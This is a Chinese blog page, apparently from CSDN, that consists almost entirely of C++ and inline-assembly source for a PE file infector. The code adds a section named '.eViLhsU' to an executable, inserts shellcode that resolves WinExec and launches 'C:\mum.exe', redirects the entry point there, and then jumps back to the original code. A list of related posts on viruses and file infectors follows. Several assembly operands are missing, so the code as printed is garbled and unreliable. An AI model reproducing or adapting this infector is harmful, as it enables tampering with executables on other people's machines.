感染EXE文件代码(C++)

最新推荐文章于 2024-10-08 15:54:30 发布
最新推荐文章于 2024-10-08 15:54:30 发布
阅读量2.7k 收藏 7
点赞数
C++代码


#include <windows.h>   
#include <winnt.h>   
#include <stdio.h>   
#include <assert.h>   
   
#define DEBUG 1   
#define EXTRA_CODE_LENGTH 18   
#define SECTION_SIZE 0x1000   
#define SECTION_NAME ".eViLhsU"   
#define FILE_NAME_LENGTH 30   
   
int Align(int size, int ALIGN_BASE)   
{   
    int ret;   
    int result;   
   
    assert( 0 != ALIGN_BASE );     
    result = size % ALIGN_BASE;   
   
    if (0 != result) //余数不为零,也就是没有整除   
    {   
         ret = ((size / ALIGN_BASE) + 1) * ALIGN_BASE;   
    }   
    else   
    {   
         ret = size;   
    }   
   
    return ret;   
}   
   
int infect(char *sFilename)   
{   
    int i;   
    BYTE jmp;   
    FILE *pNewFile;   
    int numOfSections;   
    int FILE_ALIGN_MENT;   
    int SECTION_ALIGN_MENT;   
    int extraLengthAfterAlign;   
    int extra_data_real_length;   
   
    unsigned int newEP,oldEP;     
    char *pExtra_data;   
    char srcFileName;   
    char newFileName;   
   
    IMAGE_DOS_HEADER DosHeader;   
    IMAGE_NT_HEADERS NtHeader;   
    IMAGE_SECTION_HEADER SectionHeader;   
    IMAGE_SECTION_HEADER newSectionHeader; //新增加的节的节头   
   
        
    strcpy(newFileName,sFilename);   
    strcpy(srcFileName,newFileName);   
    strcat(srcFileName, ".bak");   
   
    if (!CopyFile(newFileName,srcFileName, FALSE))   
    {   
          printf("文件备份失败\n");   
          return 1;   
    }   
   
    pNewFile = fopen(newFileName, "rb+");     
   
    if (NULL == pNewFile)   
    {   
          printf("打开文件失败\n");   
          return 1;   
    }   
   
    fseek(pNewFile, 0, SEEK_SET);   
    //读取IMAGE_DOS_HEADER   
    fread(&DosHeader, sizeof(IMAGE_DOS_HEADER), 1, pNewFile);   
   
    if (DosHeader.e_magic != IMAGE_DOS_SIGNATURE)   
    {   
        printf("该文件不是有效的PE文件\n");   
        return 1;   
    }   
   
    //先定位到pe文件头,然后读取IMAGE_NT_HEADERS   
    fseek(pNewFile, DosHeader.e_lfanew, SEEK_SET);   
    fread(&NtHeader, sizeof(IMAGE_NT_HEADERS), 1, pNewFile);   
   
    if (NtHeader.Signature != IMAGE_NT_SIGNATURE)   
    {   
        printf("该文件不是有效的PE文件\n");   
        return 1;   
    }   
   
   
    numOfSections = NtHeader.FileHeader.NumberOfSections;   
    FILE_ALIGN_MENT = NtHeader.OptionalHeader.FileAlignment;   
    SECTION_ALIGN_MENT = NtHeader.OptionalHeader.SectionAlignment;   
   
    //保存原来的入口备用   
    oldEP = NtHeader.OptionalHeader.AddressOfEntryPoint;   
   
    for (i = 0; i < numOfSections; i++)   
    {   
        fread(&SectionHeader, sizeof(IMAGE_SECTION_HEADER), 1, pNewFile);   
   
        printf("节:%s\n", SectionHeader.Name);                 
   
        if(strstr((const char*)SectionHeader.Name,".eViLhsU"))   
        {   
            printf("程序已经被感染!\n");     
            return 1;   
        }   
    }   
   
    extraLengthAfterAlign = Align(EXTRA_CODE_LENGTH, FILE_ALIGN_MENT);   
    NtHeader.FileHeader.NumberOfSections++;     
    memset(&newSectionHeader, 0, sizeof(IMAGE_SECTION_HEADER));   
    strncpy((char*)newSectionHeader.Name, SECTION_NAME, strlen(SECTION_NAME));     
   
    newSectionHeader.VirtualAddress = Align(SectionHeader.VirtualAddress +     
                                            SectionHeader.Misc.VirtualSize,   
                                            SECTION_ALIGN_MENT);   
   
    newSectionHeader.Misc.VirtualSize = Align(extraLengthAfterAlign, SECTION_ALIGN_MENT);   
   
    newSectionHeader.PointerToRawData = Align(   
                                              SectionHeader.PointerToRawData +   
                                              SectionHeader.SizeOfRawData,   
                                              FILE_ALIGN_MENT   
                                             );     
   
    newSectionHeader.SizeOfRawData = Align(SECTION_SIZE, FILE_ALIGN_MENT);   
    newSectionHeader.Characteristics = 0xE0000020; //可读可些可执行   
    NtHeader.OptionalHeader.SizeOfCode = Align(NtHeader.OptionalHeader.SizeOfCode     
                                       + SECTION_SIZE, FILE_ALIGN_MENT);     
    NtHeader.OptionalHeader.SizeOfImage = NtHeader.OptionalHeader.SizeOfImage+     
                                          Align(SECTION_SIZE, SECTION_ALIGN_MENT);   
    NtHeader.OptionalHeader.DataDirectory.VirtualAddress = 0;   
    NtHeader.OptionalHeader.DataDirectory.Size = 0;   
   
    fseek(pNewFile, 0, SEEK_END);   
    newEP = newSectionHeader.VirtualAddress;   
    NtHeader.OptionalHeader.AddressOfEntryPoint = newEP;   
    //定位节表尾部   
    fseek(   
          pNewFile,     
          DosHeader.e_lfanew +   
          sizeof(IMAGE_NT_HEADERS)     
          + numOfSections * sizeof(IMAGE_SECTION_HEADER),   
          SEEK_SET   
         );   
    //写入修正后的节头   
    fwrite(&newSectionHeader, sizeof(IMAGE_SECTION_HEADER), 1, pNewFile);   
    fseek(pNewFile, DosHeader.e_lfanew, SEEK_SET);   
    //写入修正后的PE文件头   
    fwrite(&NtHeader, sizeof(IMAGE_NT_HEADERS), 1, pNewFile);   
    fseek(pNewFile, 0, SEEK_END);   
   
    //写入新节,这里先写入0   
    for (i=0; i<Align(SECTION_SIZE, FILE_ALIGN_MENT); i++)   
    {   
       fputc(0, pNewFile);   
    }   
   
    fseek(pNewFile, newSectionHeader.PointerToRawData, SEEK_SET);   
   
goto GetExtraData;   
   
extra_data_start:   
_asm pushad   
//获取kernel32.dll的基址   
_asm mov eax, fs:0x30 ;PEB的地址   
_asm mov eax,    
_asm mov esi,    
_asm lodsd   
_asm mov eax, ;eax就是kernel32.dll的基址   
_asm mov edi, eax //同时保存kernel32.dll的基址到edi   
   
//通过搜索 kernel32.dll的导出表查找GetProcAddress函数的地址   
_asm mov ebp, eax   
_asm mov eax,    
_asm mov edx,    
_asm add edx, ebp   
_asm mov ecx,    
_asm mov ebx,    
_asm add ebx, ebp   
   
search:   
_asm dec ecx   
_asm mov esi,    
   
_asm add esi, ebp   
_asm mov eax, 0x50746547   
_asm cmp , eax //比较"PteG"   
_asm jne search   
_asm mov eax, 0x41636f72   
_asm cmp , eax   
_asm jne search   
_asm mov ebx,    
_asm add ebx, ebp   
_asm mov cx,    
_asm mov ebx,    
_asm add ebx, ebp   
_asm mov eax,    
_asm add eax, ebp //eax保存的就是GetProcAddress的地址   
   
//为局部变量分配空间   
_asm push ebp   
_asm sub esp, 50h   
_asm mov ebp, esp   
   
//查找LoadLibrary的地址   
_asm mov , eax //把GetProcAddress的地址保存到ebp + 40中   
   
//开始查找LoadLibrary的地址, 先构造"LoadLibrary\0"   
_asm push 0x0   
   
_asm push DWORD PTR 0x41797261   
_asm push DWORD PTR 0x7262694c   
_asm push DWORD PTR 0x64616f4c   
_asm push esp //压入"LoadLibrary\0"的地址   
_asm push edi //edi:kernel32的基址   
_asm call //返回值(即LoadLibrary的地址)保存在eax中   
_asm mov , eax //保存LoadLibrary的地址到ebp + 44h   
   
_asm push dword ptr 0x00636578   
_asm push dword ptr 0x456e6957   
_asm push esp   
_asm push edi   
_asm call          //GetProcAddress(Kernel32基止,"WinExec")   
_asm mov ,eax        //WinExec()的地址放在里   
   
_asm mov byte ptr ,43h     
_asm mov byte ptr ,3ah     
_asm mov byte ptr ,5ch     
_asm mov byte ptr ,6dh     
_asm mov byte ptr ,75h     
_asm mov byte ptr ,6dh     
_asm mov byte ptr ,61h     
_asm mov byte ptr ,2eh     
_asm mov byte ptr ,65h     
_asm mov byte ptr ,78h     
_asm mov byte ptr ,65h     
_asm mov byte ptr ,0h   
   
_asm lea edi,                  
_asm push edi                    
_asm call                
   
_asm mov esp, ebp   
_asm add esp, 50h   
_asm popad   
extra_data_end:   
   
   
GetExtraData:   
_asm pushad;   
_asm lea eax, extra_data_start;   
_asm mov pExtra_data, eax;   
_asm lea edx, extra_data_end;   
_asm sub edx, eax;   
_asm mov extra_data_real_length, edx;   
_asm popad;   
   
   
//写入附加数据   
   for (i = 0; i < extra_data_real_length; i++)   
   {   
       fputc(pExtra_data, pNewFile);   
   }   
   
   
   oldEP = oldEP - (newEP + extra_data_real_length) - 5;   
   
   jmp = 0xE9;   
   fwrite(&jmp, sizeof(jmp), 1, pNewFile);   
   fwrite(&oldEP, sizeof(oldEP), 1, pNewFile);   
   
   fclose(pNewFile);     
   
return 0;   
}   
   
BOOL AddEmptySection(char *ptFile,UINT uSize)   
{   
    HANDLE hFile = NULL;   
    HANDLE hMapping = NULL;     
    LPVOID bPointer = NULL;   
    PBYTE  pData = NULL;   
   
    hFile = CreateFile(   
        ptFile,     
        GENERIC_READ|GENERIC_WRITE,     
        FILE_SHARE_READ|FILE_SHARE_WRITE,   
        NULL,     
        OPEN_EXISTING,     
        FILE_FLAG_SEQUENTIAL_SCAN,   
        NULL);   
    if (hFile == INVALID_HANDLE_VALUE)   
    {   
        return FALSE;   
    }   
   
    DWORD dwSize = GetFileSize( hFile,NULL);   
    if( dwSize > 10000000)   
    {   
        CloseHandle(hFile);   
        return FALSE;   
    }   
        
    //内存映射,创建一个有名的共享内存   
    if (!(hMapping = CreateFileMapping(hFile,     
        0,     
        PAGE_READWRITE | SEC_COMMIT,     
        0,     
        dwSize,     
        NULL)))     
    {   
        CloseHandle(hFile);     
        return FALSE;   
    }     
   
    //映射对象视图,进行读写操作   
    if (!(bPointer = MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, dwSize)))     
    {      
        CloseHandle(hMapping);     
        CloseHandle(hFile);     
        return FALSE;     
    }     
   
    pData = (PBYTE)bPointer;   
   
    if (((PIMAGE_DOS_HEADER) pData)->e_magic != IMAGE_DOS_SIGNATURE)   
    {   
        return FALSE;   
    }   
   
    if( *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) == 841127)      
    {     
        UnmapViewOfFile(bPointer);   
        CloseHandle(hMapping);     
        CloseHandle(hFile);     
        return FALSE;   
    }   
    else   
    {   
         //设置标志   
         *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) = 841127;   
    }   
   
    PIMAGE_NT_HEADERS pNTHdr = (PIMAGE_NT_HEADERS) (pData + ((PIMAGE_DOS_HEADER) bPointer)->e_lfanew);   
    if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)   
    {   
        return FALSE;   
    }   
   
    if ((pNTHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) >   
        pNTHdr->OptionalHeader.SizeOfHeaders)   
    {   
        return FALSE;   
    }   
   
    DWORD uCodeDelta = Align(uSize, pNTHdr->OptionalHeader.SectionAlignment);   
    DWORD dwFileDelta = Align(uSize, pNTHdr->OptionalHeader.FileAlignment);   
    PIMAGE_SECTION_HEADER pNewSec = (PIMAGE_SECTION_HEADER) (pNTHdr + 1)     
                                  + pNTHdr->FileHeader.NumberOfSections;   
    PIMAGE_SECTION_HEADER pLastSec = pNewSec - 1;   
   
    memcpy(pNewSec->Name, ".EsT_", 5);   
    pNewSec->VirtualAddress = pLastSec->VirtualAddress + Align(pLastSec->Misc.VirtualSize,     
                                                               pNTHdr->OptionalHeader.SectionAlignment);   
    pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData;   
    pNewSec->Misc.VirtualSize = uSize;   
    pNewSec->SizeOfRawData = 0;   
    pNewSec->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE ;   
   
    pNTHdr->FileHeader.NumberOfSections++;   
    pNTHdr->OptionalHeader.SizeOfCode += uCodeDelta;   
    pNTHdr->OptionalHeader.SizeOfImage += dwFileDelta;   
    pNTHdr->OptionalHeader.DataDirectory.Size = 0;   
    pNTHdr->OptionalHeader.DataDirectory.VirtualAddress = 0;   
   
    UnmapViewOfFile(bPointer);     
    CloseHandle(hMapping);   
    CloseHandle(hFile);   
    return TRUE;   
}   
   
int main(int argc, char *argv[])   
{   
   
    if (NULL == argv)   
    {   
        printf("参数错误\n");     
    }   
   
    if(infect(argv)) exit(0); //感染程序   
    AddEmptySection(argv,100);//增加空节   
   
    return 0;   
}   
杨航 AI
关注
感染c/c++源程序的病毒
chy2z的专栏
04-25 1315
#include #include #include #include main(){      int virus(void);      virus();               /*病毒函数*/}int virus(void){      struct ffblk ffblk;      FILE *fp,*fp2,*fp3,*fp4;      int i,j,len,q,r,do
c++装逼000都市传说病毒(打开.exe文件
vscode666的博客
07-04 1694
不要在自己电脑上运行!
c++木马程序之文件感染
云守护的专栏
03-07 2333
#include "resource.h" #include bool EnumDirectory(TCHAR *dirpath,bool isInject); void inject(char *path); bool WriteResourceToFile(char const *filename); void clear(char *path); bool FileExist(char *
c++“病毒”大全(6种)
最新发布
weixin_66423343的博客
10-08 537
注:本文仅供搞笑,禁止用于非法。
c++ 感染exe运行DLL
11-12
由vc编译的 感染exe运行DLL例子 供大家参考,主要学习思路
exe全盘感染c++源码
08-05
exe全盘感染c++源码,值得学习借鉴。 可以加入到自己的小马里啊
感染EXE文件的VC++源码,请谨慎使用.
03-07
感染EXE文件的VC++源码,请谨慎使用.
文件感染C++代码
05-05
PE 文件感染WIN32CPP代码,仅作学习交流,请勿用于其他用途!
PE文件感染C++代码
杨航的专栏
12-10 2941
PE文件感染C++代码 PE文件规定了可执行文件的格式,凡是符合此格式的文件都能在windows系统上运行。PE文件的格式暂且不谈,说一些感染PE文件的几种途径。 导入表感染。这个涉及比较复杂的操作,首先,要自行写一个dll文件,提供程序中对原dll引用的所有函数,然后增加一个节区,修改ImportAddress中的地址,使其指向新增加的节,这样,程序加载后,只要调用相关函数,就会先
感染U盘程序(C++代码
09-15
### 感染U盘程序(C++代码)解析 #### 一、程序概述 本文将详细介绍一个用于演示目的的U盘感染程序的C++实现。该程序通过一系列操作自动复制自身到U盘,并设置相应的自启动配置,使得在特定条件下能够自动运行。...
自制C++病毒,ExE文件,压缩后13kb
2201_75640571的博客
07-10 252
C++病毒
感染exe的测试源码
08-21
含源码,研究使用,大家在不读懂的情况下不要运行。{我们交流的是技术,展示的源代码和相关代码的目的只是为了说明技术的原理和使用。如果任何个人或组织利用本文档发布的技术进行破坏,应由其本人负责。
通过C编程实现病毒的文件感染功能…
Confession 的技术频道
01-23 1766
编程学着不是让你领教它的枯燥无味的,是让你灵活的用它的,让人们凌驾于计算机的智慧之上,用它把你的生活变得更简单,让不完美的世界更完美,看到了很多人自己写程序表白,的确可以做出很多浪漫。     你还可以拿着它玩出各种花样,别说你能力不够,那只是你对自己懒于思考,懒于学习的借口,世上无难事只怕有心人!奉上用C编程实现简易病毒的感染功能,别人能用很高级很复杂方式做到的事情,我同样能拿着最基层的方式做到
VB 感染EXE 程序病毒源码
miaozk2006的专栏
06-03 990
使大家清楚认识病毒程序的运行机理,提高自身程序的抵抗力。 说明:1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。4、最重要的:不要搞恶意破坏,否则真进了监狱后果自负!...
C/C++ 感染标志与空字节感染
CSDN
08-18 7093
C/C++ 通过搜索PE结构中的空隙部分,对指定文件写入感染标志,作用是,如果程序被感染过则不再继续感染,而搜索空字节,则是要将恶意代码动态的填充到可执行文件中,并劫持执行流,以下代码就是这两种代码的具体实现方式。
c语言pe文件感染,C语言怎么获得进程的PE文件信息
weixin_42613017的博客
05-26 147
一、打印Sections信息。下面的程序打印出Windows_Graphics_Programming 1.1中第三个程序“Hello World Version 3:Create a Full-Screen Window"生成的可执行文件的Sections结构字节的信息#include#includechar *strPath="C:/c1_hwv3/Debug/c1_hwv3.exe";int...
一段简单的C/C++病毒源程序
热门推荐
mycaibo编程
12-07 1万+
主要是感染C/C++文件只要编译该段源程序就会使当前目录里的所有.c和.cpp文件感染上病毒,当然如果是没有主函数的源文件就没有作用:思想很简单:插入一段复制自身的代码,而这段代码是将自身的病毒部分传播给同目录下的其它文件
[语言编程] exe病毒代码实例
weixin_48195660的博客
11-16 1735
Set objFS *** CreateObject(“Scripting.FileSystemObject”) Set objFSO *** CreateObject(“Scripting.FileSystemObject”)set wsh *** wscript.createobject(“wscript.shell”)set reg *** wscript.createobject(“wscript.shell”)dim wsha *** WScript.ScriptFullNameb *** "sh
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值